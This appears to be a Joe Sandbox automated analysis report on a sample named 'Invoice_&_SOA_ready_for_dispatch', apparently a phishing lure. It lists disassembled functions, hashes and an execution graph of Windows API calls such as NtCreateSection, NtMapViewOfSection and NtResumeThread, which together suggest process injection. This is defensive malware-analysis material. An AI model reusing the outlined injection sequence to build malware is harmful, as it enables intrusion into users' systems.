                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E9D59E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4139908857-359210496
                                                                                                                              • Opcode ID: 986343793c1ee300091b56d3250230945b43f8ea15e185b23693490171f0b64d
                                                                                                                              • Instruction ID: c59cd2b6e4a7861d46ddcbbdbaefcfb6b4955a2e0025925d68123b801f6bfd75
                                                                                                                              • Opcode Fuzzy Hash: 986343793c1ee300091b56d3250230945b43f8ea15e185b23693490171f0b64d
                                                                                                                              • Instruction Fuzzy Hash: EE1102B6C003598FDB20DF9AD844BDEFBF4AB88218F10841AD818A7200D375A545CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B3ECC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 072B45BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 410705778-359210496
                                                                                                                              • Opcode ID: 587d67a394d82b6afdf843615db7abc10a659f134e99ff6c32ba5c0cd55ccd27
                                                                                                                              • Instruction ID: fd14e297860e7b46998c2fd6adc19f7741c16de0c3bc27048ac3aa516f8dea61
                                                                                                                              • Opcode Fuzzy Hash: 587d67a394d82b6afdf843615db7abc10a659f134e99ff6c32ba5c0cd55ccd27
                                                                                                                              • Instruction Fuzzy Hash: 0C1103B58007499FDB20DF9AD885BDEBBF8EB48314F10841AE918A7201C375A954CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B4559 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 072B45BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 410705778-359210496
                                                                                                                              • Opcode ID: 0889d373122fc62ca0274bc0bdf3cc8a8ebd1eeb22dfbcf0e54ec9401b76ad8e
                                                                                                                              • Instruction ID: 24423815a49ef3de4265ebba3ebf1f77568e34f60839c49907ba1cd0ef9258d1
                                                                                                                              • Opcode Fuzzy Hash: 0889d373122fc62ca0274bc0bdf3cc8a8ebd1eeb22dfbcf0e54ec9401b76ad8e
                                                                                                                              • Instruction Fuzzy Hash: 341115B68003499FDB20DF9AD885BDEFBF8EB48320F108419E918A7751C375A544CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B54E9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,072B53A1,?,?), ref: 072B5548
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2591292051-359210496
                                                                                                                              • Opcode ID: 404a238f4a24f265ab65e7fbe1abd18d19c6f9d9239bb3f6e8ff9612492c6537
                                                                                                                              • Instruction ID: ce912a492e27c9166af88ff8036a75b508bfaafcbf7177878354a0ea84cc303c
                                                                                                                              • Opcode Fuzzy Hash: 404a238f4a24f265ab65e7fbe1abd18d19c6f9d9239bb3f6e8ff9612492c6537
                                                                                                                              • Instruction Fuzzy Hash: DF1136B68003498FDB20DF9AD545BEEBBF5EB48320F24841AD958A7640C778A545CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 054E658E Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 054E6621
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 3f4c7393cc01e95fed94cb842270a815766bbad4253864260a5b4ca51f836852
                                                                                                                              • Instruction ID: 194a8dfba25943773fb669ee253c73f60e4c0b3927944da99fcfbe2a60845bc6
                                                                                                                              • Opcode Fuzzy Hash: 3f4c7393cc01e95fed94cb842270a815766bbad4253864260a5b4ca51f836852
                                                                                                                              • Instruction Fuzzy Hash: E43138B9A00205CFDB14CF55D448BEABBF2FF98314F25C499D4199B321D370A841CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02CFD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4fd49ef6c3eccde0e621f293f243cc445ab3a2a13ff91b4d90ff624748df6db9
                                                                                                                              • Instruction ID: 3957140ee1402b02a231e0d5b23c75ed1ce240e81c4f6184c1b5abfc80a62abf
                                                                                                                              • Opcode Fuzzy Hash: 4fd49ef6c3eccde0e621f293f243cc445ab3a2a13ff91b4d90ff624748df6db9
                                                                                                                              • Instruction Fuzzy Hash: F82128B1504304DFDB89DF10D9C0B16BF65FBC4324F24C169EA0B0B256C336E456CAA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02D0D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a6466e5e2003b7adeb53dbc447e419b07e4ae4d5725bab35c997e85a1f1277b3
                                                                                                                              • Instruction ID: 6a9c34b310dd9c7df15b04206f05d2f41fceb9f4e80819396f78fb8f8e637d5c
                                                                                                                              • Opcode Fuzzy Hash: a6466e5e2003b7adeb53dbc447e419b07e4ae4d5725bab35c997e85a1f1277b3
                                                                                                                              • Instruction Fuzzy Hash: 99212971504304EFDB05DFA4D5C0B25BBA6FB88314F24C56EE84A4B3A6C336DC46CA61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02D0D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1bbf4f102cb9b39c1d5d2a38a6196a93a185d4002e978c4ef8c70e2829fe6abc
                                                                                                                              • Instruction ID: 37a1f5883a86ec2419c9fece97044bf90d6da45d07b88797b8c7f1651df12f2f
                                                                                                                              • Opcode Fuzzy Hash: 1bbf4f102cb9b39c1d5d2a38a6196a93a185d4002e978c4ef8c70e2829fe6abc
                                                                                                                              • Instruction Fuzzy Hash: C621FFB1604200DFDB14DF54D8C0F26BBA6EB84214F34C56AE84E4B3A6C33AD846CA62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02D0D005 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0a4e701aa085e65e3efa65d996685749e265998578cbd1b05d9893bafde3de0a
                                                                                                                              • Instruction ID: 5512e8e16316c58ae99e3d168fec70cb140b9e6faa9c92fb11adea28a6481e78
                                                                                                                              • Opcode Fuzzy Hash: 0a4e701aa085e65e3efa65d996685749e265998578cbd1b05d9893bafde3de0a
                                                                                                                              • Instruction Fuzzy Hash: 192183755093808FC712CF24D5D0B15BF71EB46214F28C5DBD8498F6A7C33A980ACB62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02CFD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                                                              • Instruction ID: fab350031e2aa54ba8093480a2f3b332f36e6aec44b8028086b8cd7b60e3d195
                                                                                                                              • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                                                              • Instruction Fuzzy Hash: DB110376404240CFCB56CF00D5C0B16BF71FB84324F24C2A9D90A0B656C33AE556CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02D0D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                                              • Instruction ID: 48e04568bc3f4485e89578b5b29cfe4fee0f691d208dffc3250f7f9176d7f013
                                                                                                                              • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                                              • Instruction Fuzzy Hash: 0E11BB75504280DFCB12CF64C5C0B15BBB2FB88214F28C6AAD8494B7A6C33AD80ACB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02CFD745 Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c227a3846a144d42b8521fd9ad0551b3441dfca535ec2f91c33bf72df86e32aa
                                                                                                                              • Instruction ID: 6bbe38b9f42d6686478fee08c123a1250e9b7ff091f1d2689732f44fa2e1ce52
                                                                                                                              • Opcode Fuzzy Hash: c227a3846a144d42b8521fd9ad0551b3441dfca535ec2f91c33bf72df86e32aa
                                                                                                                              • Instruction Fuzzy Hash: 2D01DB714043409BE7A05E16CD84B66BB98DF82224F18C55BEE0B4F28AD7799541CA72
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02CFD744 Relevance: .0, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 18a2fb0d843f5f81e5fb7f65b67cba7e3f5a9fec9ca6f4ace5d8e4e8f1795e67
                                                                                                                              • Instruction ID: 01e3d016e587d17697f78310a18d9fd3c44c17a277e43d5144b9199c7068db4e
                                                                                                                              • Opcode Fuzzy Hash: 18a2fb0d843f5f81e5fb7f65b67cba7e3f5a9fec9ca6f4ace5d8e4e8f1795e67
                                                                                                                              • Instruction Fuzzy Hash: DAF0C2714043409EE7648E16C884B62FB98EB81234F18C49AED094F29AC3799840CAB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 054E2560 Relevance: .3, Instructions: 315COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b69475c5a0288436c07f64b3cd6cb04fa66cc1c0eb9b3498f74601af32fc112
                                                                                                                              • Instruction ID: 48cd7f8f4a525b03321468a69b6bcfaf1253bbcdd0b075b9a91b6c2f51131a20
                                                                                                                              • Opcode Fuzzy Hash: 5b69475c5a0288436c07f64b3cd6cb04fa66cc1c0eb9b3498f74601af32fc112
                                                                                                                              • Instruction Fuzzy Hash: F11296B0DC17458AE752DF66E94C18B3BA2B782319FD14B09D2612B2E1DBB411EACF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 054E1BA0 Relevance: .3, Instructions: 260COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6f7c7fa14068d72052de8992409fbb45f8b044e04e725461ccd6e999ca1e2d64
                                                                                                                              • Instruction ID: b4364875f5ba8938562d0766cc4d3b26c6e534ec543726364b6b0c4cece01d0f
                                                                                                                              • Opcode Fuzzy Hash: 6f7c7fa14068d72052de8992409fbb45f8b044e04e725461ccd6e999ca1e2d64
                                                                                                                              • Instruction Fuzzy Hash: 1DA17F36F402098FCF09DFB5C8849EEB7B2FF85301B1555AAE806AB265DB31E955CB40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 054E2550 Relevance: .2, Instructions: 224COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4fba6d940393174e34a84db5ab29ace5f4e9761a8ca03901bf44e58f324f9a0a
                                                                                                                              • Instruction ID: 0eadf2abcf22e89314da4123b142817e25251eb55ee00451d6b7172f0054ade3
                                                                                                                              • Opcode Fuzzy Hash: 4fba6d940393174e34a84db5ab29ace5f4e9761a8ca03901bf44e58f324f9a0a
                                                                                                                              • Instruction Fuzzy Hash: E4C1F9B0DC17458BD712DF66E84828B7BB2BB86325FD54B09D1612B2D1DBB410EACF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E97805 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1e169be17c575c7b3336fe7b2de35a29a20ca0599224356ff3e6a36c9381da39
                                                                                                                              • Instruction ID: cafc29936ca0daae7c000ba481612bcd4311dd57122a301e56e8cdf3dd3d5435
                                                                                                                              • Opcode Fuzzy Hash: 1e169be17c575c7b3336fe7b2de35a29a20ca0599224356ff3e6a36c9381da39
                                                                                                                              • Instruction Fuzzy Hash: 74412679E9010E9FDF14CFA9E481AEDF7B1EF48304B14E219E016EB245DA31A801CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                              Signature Coverage:11%
                                                                                                                              Total number of Nodes:401
                                                                                                                              Total number of Limit Nodes:39
                                                                                                                              execution_graph 95594 428363 95595 428384 95594->95595 95596 4283da 95594->95596 95603 4295c3 95595->95603 95598 4295c3 LdrLoadDll 95596->95598 95600 4283f0 95598->95600 95599 42839e 95607 40abf3 95599->95607 95602 4283d3 95604 4295d2 95603->95604 95606 429638 95603->95606 95604->95606 95611 423f93 95604->95611 95606->95599 95610 40ac18 95607->95610 95608 40ad35 NtCreateFile 95609 40ad74 95608->95609 95609->95602 95610->95608 95612 423fad 95611->95612 95614 423fa1 95611->95614 95612->95606 95614->95612 95616 424413 LdrLoadDll 95614->95616 95615 4240ff 95615->95606 95616->95615 95617 42b4c3 95618 42b4d3 95617->95618 95619 42b4d9 95617->95619 95622 42a4c3 95619->95622 95621 42b4ff 95625 428893 95622->95625 95624 42a4de 95624->95621 95626 4288b0 95625->95626 95627 4295c3 LdrLoadDll 95626->95627 95628 4288c1 RtlAllocateHeap 95627->95628 95628->95624 95629 423e83 95634 423e92 95629->95634 95630 423f1c 95631 423ed6 95637 42a3e3 95631->95637 95634->95630 95634->95631 95635 423f17 95634->95635 95636 42a3e3 2 API calls 95635->95636 95636->95630 95640 4288e3 95637->95640 95639 423ee6 95641 428900 95640->95641 95642 4295c3 LdrLoadDll 95641->95642 95643 428911 RtlFreeHeap 95642->95643 95643->95639 95657 423af3 95658 423b0f 95657->95658 95669 4282c3 95658->95669 95661 423b37 95664 4285d3 2 API calls 95661->95664 95662 423b4b 95673 4285d3 95662->95673 95666 423b40 95664->95666 95665 423b54 95677 42a503 LdrLoadDll RtlAllocateHeap 95665->95677 95668 423b5f 95670 4282dd 95669->95670 95671 4295c3 LdrLoadDll 95670->95671 95672 423b30 95671->95672 95672->95661 95672->95662 95674 4285f0 95673->95674 95675 4295c3 LdrLoadDll 95674->95675 95676 428601 NtClose 95675->95676 95676->95665 95677->95668 95678 428493 95679 4284b1 95678->95679 95680 4284ff 95678->95680 95681 4295c3 LdrLoadDll 95679->95681 95682 4295c3 LdrLoadDll 95680->95682 95684 4284cb 95681->95684 95683 428515 95682->95683 95687 40ae23 95684->95687 95686 4284f8 95689 40ae48 95687->95689 95688 40af65 NtReadFile 95690 40af9c 95688->95690 95689->95688 95690->95686 95644 413d63 95645 413d7c 95644->95645 95652 417553 95645->95652 95647 413d9a 95648 423f93 LdrLoadDll 95647->95648 95649 413db2 95648->95649 95650 413de6 95649->95650 95651 413dd3 PostThreadMessageW 95649->95651 95651->95650 95653 417577 95652->95653 95654 4175b3 LdrLoadDll 95653->95654 95655 41757e 95653->95655 95654->95655 95655->95647 95691 41a733 95699 4278f3 95691->95699 95693 41a777 95694 41a798 95693->95694 95706 427a83 95693->95706 95696 41a788 95697 41a7a4 95696->95697 95698 4285d3 2 API calls 95696->95698 95698->95694 95700 42794b 95699->95700 95701 427911 95699->95701 95703 4295c3 LdrLoadDll 95700->95703 95702 4295c3 LdrLoadDll 95701->95702 95704 42792b 95702->95704 95705 427961 95703->95705 95704->95693 95705->95693 95707 427ad6 95706->95707 95708 427aa4 95706->95708 95710 4295c3 LdrLoadDll 95707->95710 95709 4295c3 LdrLoadDll 95708->95709 95712 427abe 95709->95712 95711 427aec 95710->95711 95711->95696 95715 409d53 95712->95715 95714 427acf 95714->95696 95718 409d78 95715->95718 95716 409e95 NtSuspendThread 95717 409eb0 95716->95717 95717->95714 95718->95716 95719 41d793 95720 41d7b9 95719->95720 95721 423f93 LdrLoadDll 95720->95721 95723 41d80d 95721->95723 95722 41db86 95723->95722 95766 428973 LdrLoadDll 95723->95766 95725 41d85e 95728 41db6e 95725->95728 95767 42b5f3 95725->95767 95726 42a3e3 2 API calls 95726->95722 95728->95726 95729 41d87d 95729->95728 95730 41d986 95729->95730 95774 427cf3 95729->95774 95773 418873 LdrLoadDll LdrInitializeThunk 95730->95773 95734 41d9b1 95734->95728 95738 41d9e6 95734->95738 95782 418763 NtMapViewOfSection LdrLoadDll 95734->95782 95735 41d96c 95739 42a3e3 2 API calls 95735->95739 95736 41d90c 95736->95722 95736->95735 95737 41d93b 95736->95737 95780 418763 NtMapViewOfSection LdrLoadDll 95736->95780 95742 4285d3 2 API calls 95737->95742 95746 41da16 95738->95746 95747 41db4d 95738->95747 95743 41d97c 95739->95743 95744 41d94b 95742->95744 95781 425ae3 NtDelayExecution LdrLoadDll 95744->95781 95783 428663 LdrLoadDll 95746->95783 95749 42a3e3 2 API calls 95747->95749 95750 41db64 95749->95750 95751 41da35 95784 41a5e3 95751->95784 95753 41da9e 95753->95728 95754 41daa9 95753->95754 95755 42a3e3 2 API calls 95754->95755 95756 41dacd 95755->95756 95791 427f53 LdrLoadDll 95756->95791 95758 41dae1 95792 427e93 95758->95792 95760 41db08 95761 41db0f 95760->95761 95801 427f53 LdrLoadDll 95760->95801 95763 41db35 95802 427b03 95763->95802 95765 41db43 95766->95725 95768 42b563 95767->95768 95769 42a4c3 2 API calls 95768->95769 95770 42b5c0 95768->95770 95771 42b59d 95769->95771 95770->95729 95772 42a3e3 2 API calls 95771->95772 95772->95770 95773->95734 95775 427d0d 95774->95775 95776 4295c3 LdrLoadDll 95775->95776 95777 427d1e 95776->95777 95811 14a2c0a 95777->95811 95778 41d904 95778->95730 95778->95736 95780->95737 95781->95735 95782->95738 95783->95751 95785 41a600 95784->95785 95814 427de3 95785->95814 95787 41a650 95788 41a657 95787->95788 95789 427e93 2 API calls 95787->95789 95788->95753 95790 41a680 95789->95790 95790->95753 95791->95758 95793 427f03 95792->95793 95794 427eb1 95792->95794 95796 4295c3 LdrLoadDll 95793->95796 95795 4295c3 LdrLoadDll 95794->95795 95797 427ecb 95795->95797 95798 427f19 95796->95798 95827 40a9c3 95797->95827 95798->95760 95800 427efc 95800->95760 95801->95763 95803 427b56 95802->95803 95804 427b24 95802->95804 95806 4295c3 LdrLoadDll 95803->95806 95805 4295c3 LdrLoadDll 95804->95805 95807 427b3e 95805->95807 95808 427b6c 95806->95808 95831 40a383 95807->95831 95808->95765 95810 427b4f 95810->95765 95812 14a2c1f LdrInitializeThunk 95811->95812 95813 14a2c11 95811->95813 95812->95778 95813->95778 95815 427e47 95814->95815 95816 427e01 95814->95816 95818 4295c3 LdrLoadDll 95815->95818 95817 4295c3 LdrLoadDll 95816->95817 95819 427e1b 95817->95819 95820 427e5d 95818->95820 95823 40a7a3 95819->95823 95820->95787 95822 427e40 95822->95787 95826 40a7c8 95823->95826 95824 40a8e5 NtCreateSection 95825 40a914 95824->95825 95825->95822 95826->95824 95830 40a9e8 95827->95830 95828 40ab05 NtMapViewOfSection 95829 40ab40 95828->95829 95829->95800 95830->95828 95834 40a3a8 95831->95834 95832 40a4c5 NtResumeThread 95833 40a4e0 95832->95833 95833->95810 95834->95832 95835 401c39 95836 401be2 95835->95836 95837 401c3d 95835->95837 95840 42b963 95836->95840 95843 429fd3 95840->95843 95844 429ff9 95843->95844 95855 416483 95844->95855 95846 42a00f 95854 401c08 95846->95854 95858 41a553 95846->95858 95848 42a02e 95849 42a043 95848->95849 95874 428933 95848->95874 95870 426393 95849->95870 95852 42a052 95853 428933 2 API calls 95852->95853 95853->95854 95857 416490 95855->95857 95878 4163d3 95855->95878 95857->95846 95859 41a57f 95858->95859 95903 4178e3 95859->95903 95861 41a591 95907 41a443 95861->95907 95864 41a5c4 95866 41a5d5 95864->95866 95869 4285d3 2 API calls 95864->95869 95865 41a5ac 95867 41a5b7 95865->95867 95868 4285d3 2 API calls 95865->95868 95866->95848 95867->95848 95868->95867 95869->95866 95871 4263ed 95870->95871 95873 4263fa 95871->95873 95935 418083 95871->95935 95873->95852 95875 42894d 95874->95875 95876 4295c3 LdrLoadDll 95875->95876 95877 42895e ExitProcess 95876->95877 95877->95849 95885 425453 95878->95885 95882 4163f6 95884 416403 95882->95884 95892 428f53 95882->95892 95884->95857 95886 425462 95885->95886 95887 423f93 LdrLoadDll 95886->95887 95888 4163ea 95887->95888 95889 4254a3 95888->95889 95899 428843 95889->95899 95894 428f6b 95892->95894 95893 428f8f 95893->95884 95894->95893 95895 427cf3 2 API calls 95894->95895 95896 428fe4 95895->95896 95897 42a3e3 2 API calls 95896->95897 95898 428ffd 95897->95898 95898->95884 95900 428860 95899->95900 95901 4295c3 LdrLoadDll 95900->95901 95902 4254c0 95901->95902 95902->95882 95904 417929 95903->95904 95917 417773 LdrLoadDll 95904->95917 95906 4179bc 95906->95861 95908 41a45d 95907->95908 95916 41a539 95907->95916 95918 417833 95908->95918 95910 41a4a2 95923 427d43 95910->95923 95912 41a4e7 95927 427d93 95912->95927 95915 4285d3 2 API calls 95915->95916 95916->95864 95916->95865 95917->95906 95919 417858 95918->95919 95922 417863 95919->95922 95933 417773 LdrLoadDll 95919->95933 95921 4178ab 95921->95910 95922->95910 95924 427d5d 95923->95924 95925 4295c3 LdrLoadDll 95924->95925 95926 427d6e 95925->95926 95926->95912 95928 427db0 95927->95928 95929 4295c3 LdrLoadDll 95928->95929 95930 427dc1 95929->95930 95934 14a35c0 LdrInitializeThunk 95930->95934 95931 41a52d 